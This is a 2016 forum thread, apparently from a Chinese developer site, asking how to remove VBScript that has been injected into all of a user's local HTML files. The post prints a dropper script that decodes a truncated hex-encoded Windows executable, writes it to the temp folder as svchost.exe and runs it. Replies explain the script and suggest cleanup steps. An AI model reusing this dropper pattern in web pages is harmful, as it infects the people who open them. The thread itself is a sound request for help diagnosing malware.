是这样的,我本地的 html 文件全部被写入了一大推 VBScript 代码,新建的 html 过不了一会儿也会中招,我想问问不重装系统的话能解决么?(貌似只重装系统也没用)
billyu · 2016-01-03 23:18:43 +08:00 · 7150 次点击这是一个创建于 3237 天前的主题,其中的信息可能已经有所发展或是发生改变。
贴上一部分代码,因为那代码实在太长了
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000......中间省略......5737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000004578697450726F636573730000004472616746696E697368000057696E48656C705700000000000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath
 |
1
vmebeh 2016-01-03 23:23:15 +08:00
4D5A
M Z WriteData 的内容是 Windows 可执行文件 GetSpecialFolder https://msdn.microsoft.com/en-us/library/a72y2t1c(v=vs.84).aspx 把 WriteData 写到 %temp%\svchost.exe 然后执行 |
 |
2
xiamx 2016-01-03 23:53:48 +08:00
真有意思,这款病毒叫什么名字?
|
 |
4
weing104 2016-01-04 00:10:36 +08:00
好吧,我也中过,结果把文件全删了
|
 |
5
my101du 2016-01-04 00:10:55 +08:00
服务器下载下来的代码?安全狗 windows 版可以扫出来吗?
|
 |
8
maskerTUI 2016-01-04 00:25:01 +08:00 via Android  1
先杀毒,干掉病毒文件,用 super replace (没记错应该是这个名字)把全部 HTML 文件的病毒代码删掉。我半年前也中过一次,不过很快就搞定了。
|
|
9
maskerTUI 2016-01-04 00:26:19 +08:00 via Android
我当时用金山毒霸杀的,你也试试?
|
 |
11
em70 2016-01-04 00:28:55 +08:00
裸奔还有理了
|
 |
13
zonghua 2016-01-04 00:51:00 +08:00 via iPhone 1
那些 U 盘快捷方式病毒也是 VBS ,解决办法就是在 Linux 系统里格式化
|
 |
14
GNiux 2016-01-16 10:30:57 +08:00 via iPhone
是在个人电脑中招而不是服务器?
|
Select Language